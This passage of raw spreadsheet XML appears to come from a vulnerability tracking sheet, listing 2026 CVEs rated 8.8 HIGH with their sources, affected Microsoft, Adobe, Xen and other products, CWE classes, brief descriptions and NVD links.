t="n"><v>8.800000000000001</v></c><c r="E386" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F386" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G386" s="5" t="inlineStr" /><c r="H386" s="5" t="n"><v>0.008</v></c><c r="I386" s="5" t="inlineStr" /><c r="J386" s="5" t="inlineStr" /><c r="K386" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L386" s="5" t="inlineStr" /><c r="M386" s="5" t="inlineStr" /><c r="N386" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O386" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P386" s="5" t="inlineStr" /><c r="Q386" s="5" t="inlineStr"><is><t>CWE-787</t></is></c><c r="R386" s="5" t="inlineStr"><is><t>Out-of-bounds write in Microsoft Office allows an unauthorized attacker to execute code over a network.</t></is></c><c r="S386" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78524</t></is></c></row><row r="387"><c r="A387" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B387" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C387" s="5" t="inlineStr"><is><t>CVE-2026-78525</t></is></c><c r="D387" s="5" t="n"><v>8.800000000000001</v></c><c r="E387" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F387" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G387" s="5" t="inlineStr" /><c r="H387" s="5" t="n"><v>0.008</v></c><c r="I387" s="5" t="inlineStr" /><c r="J387" s="5" t="inlineStr" /><c r="K387" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t></is></c><c r="L387" s="5" t="inlineStr" /><c r="M387" s="5" t="inlineStr" /><c r="N387" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O387" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P387" s="5" t="inlineStr" /><c r="Q387" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="R387" s="5" t="inlineStr"><is><t>Use after free in Microsoft Office Outlook allows an unauthorized attacker to execute code over a network.</t></is></c><c r="S387" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78525</t></is></c></row><row r="388"><c r="A388" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B388" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C388" s="5" t="inlineStr"><is><t>CVE-2026-78526</t></is></c><c r="D388" s="5" t="n"><v>8.800000000000001</v></c><c r="E388" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F388" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G388" s="5" t="inlineStr" /><c r="H388" s="5" t="n"><v>0.006</v></c><c r="I388" s="5" t="inlineStr" /><c r="J388" s="5" t="inlineStr" /><c r="K388" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L388" s="5" t="inlineStr" /><c r="M388" s="5" t="inlineStr" /><c r="N388" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O388" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P388" s="5" t="inlineStr" /><c r="Q388" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R388" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Office Word allows an unauthorized attacker to execute code over a network.</t></is></c><c r="S388" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78526</t></is></c></row><row r="389"><c r="A389" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B389" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C389" s="5" t="inlineStr"><is><t>CVE-2026-78834</t></is></c><c r="D389" s="5" t="n"><v>8.800000000000001</v></c><c r="E389" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F389" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G389" s="5" t="inlineStr" /><c r="H389" s="5" t="n"><v>0.005</v></c><c r="I389" s="5" t="inlineStr" /><c r="J389" s="5" t="inlineStr" /><c r="K389" s="5" t="inlineStr" /><c r="L389" s="5" t="inlineStr" /><c r="M389" s="5" t="inlineStr" /><c r="N389" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O389" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P389" s="5" t="inlineStr" /><c r="Q389" s="5" t="inlineStr"><is><t>CWE-94</t></is></c><c r="R389" s="5" t="inlineStr"><is><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is></c><c r="S389" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78834</t></is></c></row><row r="390"><c r="A390" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B390" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C390" s="5" t="inlineStr"><is><t>CVE-2026-79376</t></is></c><c r="D390" s="5" t="n"><v>8.800000000000001</v></c><c r="E390" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F390" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G390" s="5" t="inlineStr" /><c r="H390" s="5" t="n"><v>0.002</v></c><c r="I390" s="5" t="inlineStr" /><c r="J390" s="5" t="inlineStr" /><c r="K390" s="5" t="inlineStr" /><c r="L390" s="5" t="inlineStr" /><c r="M390" s="5" t="inlineStr" /><c r="N390" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O390" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P390" s="5" t="inlineStr" /><c r="Q390" s="5" t="inlineStr"><is><t>CWE-1284, CWE-20</t></is></c><c r="R390" s="5" t="inlineStr"><is><t>An issue in the l2cap_handle_data() function of Bestechnic Co., Ltd BES2300 Bluetooth Audio SoC firmware v3.x and earlier allows attackers to cause a Denial of Service (DoS) via sending a crafted L2CAP packet.</t></is></c><c r="S390" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-79376</t></is></c></row><row r="391"><c r="A391" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B391" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C391" s="5" t="inlineStr"><is><t>CVE-2026-79602</t></is></c><c r="D391" s="5" t="n"><v>8.800000000000001</v></c><c r="E391" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F391" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G391" s="5" t="inlineStr" /><c r="H391" s="5" t="n"><v>0.001</v></c><c r="I391" s="5" t="inlineStr" /><c r="J391" s="5" t="inlineStr" /><c r="K391" s="5" t="inlineStr" /><c r="L391" s="5" t="inlineStr" /><c r="M391" s="5" t="inlineStr" /><c r="N391" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O391" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P391" s="5" t="inlineStr" /><c r="Q391" s="5" t="inlineStr"><is><t>CWE-119</t></is></c><c r="R391" s="5" t="inlineStr"><is><t>A guest with a PCI device assigned that has at least a BAR on the IO port
space can trigger a BUG() in Xen.</t></is></c><c r="S391" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-79602</t></is></c></row><row r="392"><c r="A392" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B392" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C392" s="5" t="inlineStr"><is><t>CVE-2026-79674</t></is></c><c r="D392" s="5" t="n"><v>8.800000000000001</v></c><c r="E392" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F392" s="5" t="inlineStr"><is><t>GHSA</t></is></c><c r="G392" s="5" t="inlineStr" /><c r="H392" s="5" t="n"><v>0.002</v></c><c r="I392" s="5" t="inlineStr" /><c r="J392" s="5" t="inlineStr" /><c r="K392" s="5" t="inlineStr" /><c r="L392" s="5" t="inlineStr"><is><t>pip:nltk</t></is></c><c r="M392" s="5" t="inlineStr"><is><t>3.10.3</t></is></c><c r="N392" s="5" t="inlineStr"><is><t>GHSA, OSV</t></is></c><c r="O392" s="5" t="inlineStr" /><c r="P392" s="5" t="inlineStr" /><c r="Q392" s="5" t="inlineStr"><is><t>CWE-73</t></is></c><c r="R392"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S392" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-79674</t></is></c></row><row r="393"><c r="A393" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B393" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C393" s="5" t="inlineStr"><is><t>CVE-2026-79744</t></is></c><c r="D393" s="5" t="n"><v>8.800000000000001</v></c><c r="E393" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F393" s="5" t="inlineStr"><is><t>security-advisories@github.com</t></is></c><c r="G393" s="5" t="inlineStr" /><c r="H393" s="5" t="n"><v>0.003</v></c><c r="I393" s="5" t="inlineStr" /><c r="J393" s="5" t="inlineStr" /><c r="K393" s="5" t="inlineStr" /><c r="L393" s="5" t="inlineStr" /><c r="M393" s="5" t="inlineStr" /><c r="N393" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O393" s="5" t="inlineStr"><is><t>2026-08-31</t></is></c><c r="P393" s="5" t="inlineStr" /><c r="Q393" s="5" t="inlineStr"><is><t>CWE-269, CWE-862</t></is></c><c r="R393" s="5" t="inlineStr"><is><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is></c><c r="S393" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-79744</t></is></c></row><row r="394"><c r="A394" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B394" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C394" s="5" t="inlineStr"><is><t>CVE-2026-80074</t></is></c><c r="D394" s="5" t="n"><v>8.800000000000001</v></c><c r="E394" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F394" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G394" s="5" t="inlineStr" /><c r="H394" s="5" t="n"><v>0.006</v></c><c r="I394" s="5" t="inlineStr" /><c r="J394" s="5" t="inlineStr" /><c r="K394" s="5" t="inlineStr" /><c r="L394" s="5" t="inlineStr" /><c r="M394" s="5" t="inlineStr" /><c r="N394" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O394" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P394" s="5" t="inlineStr" /><c r="Q394" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R394" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Remote Desktop Client allows an unauthorized attacker to execute code over a network.</t></is></c><c r="S394" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-80074</t></is></c></row><row r="395"><c r="A395" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B395" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C395" s="5" t="inlineStr"><is><t>CVE-2026-80077</t></is></c><c r="D395" s="5" t="n"><v>8.800000000000001</v></c><c r="E395" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F395" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G395" s="5" t="inlineStr" /><c r="H395" s="5" t="n"><v>0.006</v></c><c r="I395" s="5" t="inlineStr" /><c r="J395" s="5" t="inlineStr" /><c r="K395" s="5" t="inlineStr" /><c r="L395" s="5" t="inlineStr" /><c r="M395" s="5" t="inlineStr" /><c r="N395" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O395" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P395" s="5" t="inlineStr" /><c r="Q395" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R395" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Remote Desktop Client allows an unauthorized attacker to execute code over a network.</t></is></c><c r="S395" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-80077</t></is></c></row><row r="396"><c r="A396" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B396" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C396" s="5" t="inlineStr"><is><t>CVE-2026-80080</t></is></c><c r="D396" s="5" t="n"><v>8.800000000000001</v></c><c r="E396" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F396" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G396" s="5" t="inlineStr" /><c r="H396" s="5" t="n"><v>0.006</v></c><c r="I396" s="5" t="inlineStr" /><c r="J396" s="5" t="inlineStr" /><c r="K396" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t></is></c><c r="L396" s="5" t="inlineStr" /><c r="M396" s="5" t="inlineStr" /><c r="N396" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O396" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P396" s="5" t="inlineStr" /><c r="Q396" s="5" t="inlineStr"><is><t>CWE-415</t></is></c><c r="R396" s="5" t="inlineStr"><is><t>Double free in Microsoft Office Word allows an unauthorized attacker to execute code over a network.</t></is></c><c r="S396" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-80080</t></is></c></row><row r="397"><c r="A397" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B397" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C397" s="5" t="inlineStr"><is><t>CVE-2026-80081</t></is></c><c r="D397" s="5" t="n"><v>8.800000000000001</v></c><c r="E397" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F397" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G397" s="5" t="inlineStr" /><c r="H397" s="5" t="n"><v>0.005</v></c><c r="I397" s="5" t="inlineStr" /><c r="J397" s="5" t="inlineStr" /><c r="K397" s="5" t="inlineStr"><is><t>microsoft:365_apps</t></is></c><c r="L397" s="5" t="inlineStr" /><c r="M397" s="5" t="inlineStr" /><c r="N397" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O397" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P397" s="5" t="inlineStr" /><c r="Q397" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="R397" s="5" t="inlineStr"><is><t>Use after free in Microsoft Office PowerPoint allows an unauthorized attacker to execute code over a network.</t></is></c><c r="S397" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-80081</t></is></c></row><row r="398"><c r="A398" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B398" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C398" s="5" t="inlineStr"><is><t>CVE-2026-80083</t></is></c><c r="D398" s="5" t="n"><v>8.800000000000001</v></c><c r="E398" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F398" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G398" s="5" t="inlineStr" /><c r="H398" s="5" t="n"><v>0.002</v></c><c r="I398" s="5" t="inlineStr" /><c r="J398" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K398" s="5" t="inlineStr"><is><t>microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L398" s="5" t="inlineStr" /><c r="M398" s="5" t="inlineStr" /><c r="N398" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O398" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P398" s="5" t="inlineStr" /><c r="Q398" s="5" t="inlineStr"><is><t>CWE-822</t></is></c><c r="R398" s="5" t="inlineStr"><is><t>Untrusted pointer dereference in Windows Hyper-V allows an authorized attacker to execute code locally.</t></is></c><c r="S398" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-80083</t></is></c></row><row r="399"><c r="A399" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B399" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C399" s="5" t="inlineStr"><is><t>CVE-2026-80085</t></is></c><c r="D399" s="5" t="n"><v>8.800000000000001</v></c><c r="E399" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F399" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G399" s="5" t="inlineStr" /><c r="H399" s="5" t="n"><v>0.005</v></c><c r="I399" s="5" t="inlineStr" /><c r="J399" s="5" t="inlineStr" /><c r="K399" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t></is></c><c r="L399" s="5" t="inlineStr" /><c r="M399" s="5" t="inlineStr" /><c r="N399" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O399" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P399" s="5" t="inlineStr" /><c r="Q399" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R399" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Office Word allows an unauthorized attacker to execute code over a network.</t></is></c><c r="S399" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-80085</t></is></c></row><row r="400"><c r="A400" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B400" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C400" s="5" t="inlineStr"><is><t>CVE-2026-80096</t></is></c><c r="D400" s="5" t="n"><v>8.800000000000001</v></c><c r="E400" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F400" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G400" s="5" t="inlineStr" /><c r="H400" s="5" t="n"><v>0.007</v></c><c r="I400" s="5" t="inlineStr" /><c r="J400" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K40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00" s="5" t="inlineStr" /><c r="M400" s="5" t="inlineStr" /><c r="N400" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O400" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P400" s="5" t="inlineStr" /><c r="Q400" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="R400" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows Remote Desktop Services allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="S400" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-80096</t></is></c></row><row r="401"><c r="A401" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B401" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C401" s="5" t="inlineStr"><is><t>CVE-2026-80465</t></is></c><c r="D401" s="5" t="n"><v>8.800000000000001</v></c><c r="E401" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F401" s="5" t="inlineStr"><is><t>productcert@siemens.com</t></is></c><c r="G401" s="5" t="inlineStr" /><c r="H401" s="5" t="n"><v>0.002</v></c><c r="I401" s="5" t="inlineStr" /><c r="J401" s="5" t="inlineStr" /><c r="K401" s="5" t="inlineStr" /><c r="L401" s="5" t="inlineStr" /><c r="M401" s="5" t="inlineStr" /><c r="N401" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O401" s="5" t="inlineStr"><is><t>2026-09-03</t></is></c><c r="P401" s="5" t="inlineStr" /><c r="Q401" s="5" t="inlineStr"><is><t>CWE-347</t></is></c><c r="R401" s="5" t="inlineStr"><is><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is></c><c r="S401" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-80465</t></is></c></row><row r="402"><c r="A402" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B402" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C402" s="5" t="inlineStr"><is><t>CVE-2026-81352</t></is></c><c r="D402" s="5" t="n"><v>8.800000000000001</v></c><c r="E402" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F402" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G402" s="5" t="inlineStr" /><c r="H402" s="5" t="n"><v>0.005</v></c><c r="I402" s="5" t="inlineStr" /><c r="J402" s="5" t="inlineStr" /><c r="K402" s="5" t="inlineStr" /><c r="L402" s="5" t="inlineStr" /><c r="M402" s="5" t="inlineStr" /><c r="N402" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O402" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P402" s="5" t="inlineStr" /><c r="Q402" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R402" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Windows Codecs Library allows an unauthorized attacker to execute code over a network.</t></is></c><c r="S402" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81352</t></is></c></row><row r="403"><c r="A403" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B403" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C403" s="5" t="inlineStr"><is><t>CVE-2026-81385</t></is></c><c r="D403" s="5" t="n"><v>8.800000000000001</v></c><c r="E403" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F403" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G403" s="5" t="inlineStr" /><c r="H403" s="5" t="n"><v>0.01</v></c><c r="I403" s="5" t="inlineStr" /><c r="J403" s="5" t="inlineStr" /><c r="K403" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:publisher</t></is></c><c r="L403" s="5" t="inlineStr" /><c r="M403" s="5" t="inlineStr" /><c r="N403" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O403" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P403" s="5" t="inlineStr" /><c r="Q403" s="5" t="inlineStr"><is><t>CWE-502</t></is></c><c r="R403" s="5" t="inlineStr"><is><t>Deserialization of untrusted data in Microsoft Office Publisher allows an unauthorized attacker to execute code over a network.</t></is></c><c r="S403" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81385</t></is></c></row><row r="404"><c r="A404" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B404" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C404" s="5" t="inlineStr"><is><t>CVE-2026-81543</t></is></c><c r="D404" s="5" t="n"><v>8.800000000000001</v></c><c r="E404" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F404" s="5" t="inlineStr"><is><t>security@wordfence.com</t></is></c><c r="G404" s="5" t="inlineStr" /><c r="H404" s="5" t="n"><v>0.002</v></c><c r="I404" s="5" t="inlineStr" /><c r="J404" s="5" t="inlineStr" /><c r="K404" s="5" t="inlineStr" /><c r="L404" s="5" t="inlineStr" /><c r="M404" s="5" t="inlineStr" /><c r="N404" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O404" s="5" t="inlineStr"><is><t>2026-09-05</t></is></c><c r="P404" s="5" t="inlineStr" /><c r="Q404" s="5" t="inlineStr"><is><t>CWE-269</t></is></c><c r="R404" s="5" t="inlineStr"><is><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is></c><c r="S404" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81543</t></is></c></row><row r="405"><c r="A405" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B405" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C405" s="5" t="inlineStr"><is><t>CVE-2026-81952</t></is></c><c r="D405" s="5" t="n"><v>8.800000000000001</v></c><c r="E405" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F405" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G405" s="5" t="inlineStr" /><c r="H405" s="5" t="n"><v>0.006</v></c><c r="I405" s="5" t="inlineStr" /><c r="J405" s="5" t="inlineStr" /><c r="K405" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L405" s="5" t="inlineStr" /><c r="M405" s="5" t="inlineStr" /><c r="N405" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O405" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P405" s="5" t="inlineStr" /><c r="Q405" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R405" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Office Word allows an unauthorized attacker to execute code over a network.</t></is></c><c r="S405" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81952</t></is></c></row><row r="406"><c r="A406" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B406" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C406" s="5" t="inlineStr"><is><t>CVE-2026-81955</t></is></c><c r="D406" s="5" t="n"><v>8.800000000000001</v></c><c r="E406" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F406" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G406" s="5" t="inlineStr" /><c r="H406" s="5" t="n"><v>0.006</v></c><c r="I406" s="5" t="inlineStr" /><c r="J406" s="5" t="inlineStr" /><c r="K406" s="5" t="inlineStr" /><c r="L406" s="5" t="inlineStr" /><c r="M406" s="5" t="inlineStr" /><c r="N406" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O406" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P406" s="5" t="inlineStr" /><c r="Q406" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R406" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Graphics Component allows an unauthorized attacker to execute code over a network.</t></is></c><c r="S406" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81955</t></is></c></row><row r="407"><c r="A407" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B407" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C407" s="5" t="inlineStr"><is><t>CVE-2026-81996</t></is></c><c r="D407" s="5" t="n"><v>8.800000000000001</v></c><c r="E407" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F407" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G407" s="5" t="inlineStr" /><c r="H407" s="5" t="n"><v>0.001</v></c><c r="I407" s="5" t="inlineStr" /><c r="J407" s="5" t="inlineStr" /><c r="K407" s="5" t="inlineStr"><is><t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t></is></c><c r="L407" s="5" t="inlineStr" /><c r="M407" s="5" t="inlineStr" /><c r="N407" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O407" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P407" s="5" t="inlineStr" /><c r="Q407" s="5" t="inlineStr"><is><t>CWE-863</t></is></c><c r="R407" s="5" t="inlineStr"><is><t>Acrobat Reader is affected by an Incorrect Authorization vulnerability that could result in privilege escalation. A low-privileged attacker could exploit this vulnerability to gain elevated access. Exploitation of this issue does not require user interaction. Scope is changed.</t></is></c><c r="S407" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81996</t></is></c></row><row r="408"><c r="A408" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B408" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C408" s="5" t="inlineStr"><is><t>CVE-2026-82536</t></is></c><c r="D408" s="5" t="n"><v>8.800000000000001</v></c><c r="E408" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F408" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G408" s="5" t="inlineStr" /><c r="H408" s="5" t="n"><v>0.003</v></c><c r="I408" s="5" t="inlineStr" /><c r="J408" s="5" t="inlineStr" /><c r="K408" s="5" t="inlineStr" /><c r="L408" s="5" t="inlineStr" /><c r="M408" s="5" t="inlineStr" /><c r="N408" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O408" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P408" s="5" t="inlineStr" /><c r="Q408" s="5" t="inlineStr"><is><t>CWE-184</t></is></c><c r="R408" s="5" t="inlineStr"><is><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is></c><c r="S408" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-82536</t></is></c></row><row r="409"><c r="A409" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B409" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C409" s="5" t="inlineStr"><is><t>CVE-2026-83941</t></is></c><c r="D409" s="5" t="n"><v>8.800000000000001</v></c><c r="E409" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F409" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G409" s="5" t="inlineStr" /><c r="H409" s="5" t="n"><v>0.007</v></c><c r="I409" s="5" t="inlineStr" /><c r="J409" s="5" t="inlineStr" /><c r="K409" s="5" t="inlineStr"><is><t>microsoft:entra_id</t></is></c><c r="L409" s="5" t="inlineStr" /><c r="M409" s="5" t="inlineStr" /><c r="N409" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O409" s="5" 